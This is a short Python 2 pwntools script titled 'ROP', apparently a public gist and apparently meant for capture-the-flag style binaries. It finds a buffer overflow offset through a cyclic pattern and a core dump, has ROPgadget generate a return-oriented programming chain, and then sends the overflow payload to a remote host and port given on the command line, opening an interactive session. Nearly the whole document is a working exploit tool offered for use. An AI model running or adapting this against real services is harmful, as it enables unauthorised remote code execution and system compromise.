@karimmuya
Last active July 27, 2022 19:05
ROP
#!/usr/bin/python2
# pwntools script (Python 2): crash a local copy of BINARY with a cyclic
# pattern to measure the overwrite offset, let ROPgadget generate a chain for
# that binary, then send padding + chain to HOST:PORT.
from pwn import *
from subprocess import Popen, PIPE
import sys

# DEBUG makes pwntools hexdump every byte sent and received, so the full
# payload ends up in the log output.
context.log_level = "DEBUG"
if len(sys.argv) != 4:
    # NOTE: no space between the script name and "[BINARY]" in the message.
    print("usage{}[BINARY] [HOST][PORT]".format(sys.argv[0]))
    exit(0)
context.binary = sys.argv[1]  # ELF loaded by pwntools; arch/bits are taken from it
port = sys.argv[3]
host = sys.argv[2]

# Step 1: run the binary locally, feed it a 1024-byte cyclic pattern and read
# the faulting address back out of the core dump. Assumes the crashed
# process leaves a core file at ./core; Coredump() fails otherwise.
t = process(context.binary.path)
# payload=cyclic()
t.sendline(cyclic(1024))
t.wait()   # wait for the process to exit so the core file is complete before reading it
t.close()
core = Coredump("./core")
off = cyclic_find(core.fault_addr)  # position of the faulting address within the pattern
log.info("offset found:{}".format(off))

# Step 2: have ROPgadget print its auto-generated chain, which it emits as
# Python source after a "#!" line.
stdout = Popen(["ROPgadget", "--ropchain", "--binary",
                context.binary.path], stdout=PIPE).communicate()[0]
stdout = stdout.decode("utf-8")
print(stdout)
# Take everything from the shebang onwards and strip tabs. If ROPgadget is
# absent or prints no "#!", find() returns -1 and the slice is just the last
# character, so the exec below fails or leaves `p` undefined.
pycode = stdout[stdout.find("#!"):].replace("\t", "")
# exec() of another tool's stdout: whatever ROPgadget printed runs with this
# script's privileges. Inspect `pycode` (it is printed above) before trusting
# the result; the generated code is presumably what defines `p`.
exec(pycode)
ropchain = p
log.info("{}".format(ropchain))

# Step 3: send padding up to `off` followed by the chain to the remote
# service and hand the connection to the user (local run left commented out).
# t=process(context.binary.path)
t = remote(host, port)
t.sendline(fit({off: ropchain}))
t.interactive()
t.close()